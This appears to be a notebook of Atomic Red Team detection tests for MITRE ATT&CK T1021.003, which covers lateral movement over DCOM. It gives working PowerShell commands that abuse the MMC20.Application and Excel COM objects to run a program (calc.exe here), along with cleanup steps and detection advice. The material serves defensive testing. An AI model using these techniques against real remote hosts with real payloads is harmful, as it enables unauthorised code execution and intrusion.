# T1021.003 - Distributed Component Object Model
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)

## Atomic Tests

### Atomic Test #1 - PowerShell Lateral Movement using MMC20Powershell lateral movement using the mmc20 application com object.

Reference:

https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/

Upon successful execution, cmd will spawn calc.exe on a remote computer.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","localhost")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
```

In [ ]:
Invoke-AtomicTest T1021.003 -TestNumbers 1

### Atomic Test #2 - PowerShell Lateral Movement Using Excel Application Object
Powershell lateral movement using the Excel COM objects.

Reference:

https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922

Upon successful execution, cmd will spawn calc.exe on a remote computer.

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Excel must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Excel.Application" | Out-Null
  Stop-Process -Name "Excel"
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Excel manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1021.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
copy c:\windows\system32\calc.exe 'C:\users\admin\AppData\local\Microsoft\WindowsApps\foxprow.exe'
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","localhost"))
$com.ActivateMicrosoftApp("5")
```

In [ ]:
Invoke-AtomicTest T1021.003 -TestNumbers 2

#### Cleanup: 
```powershell
Remove-Item 'C:\users\admin\AppData\local\Microsoft\WindowsApps\foxprow.exe'
```

In [ ]:
Invoke-AtomicTest T1021.003 -TestNumbers 2 -Cleanup

## Detection
Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.

Monitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).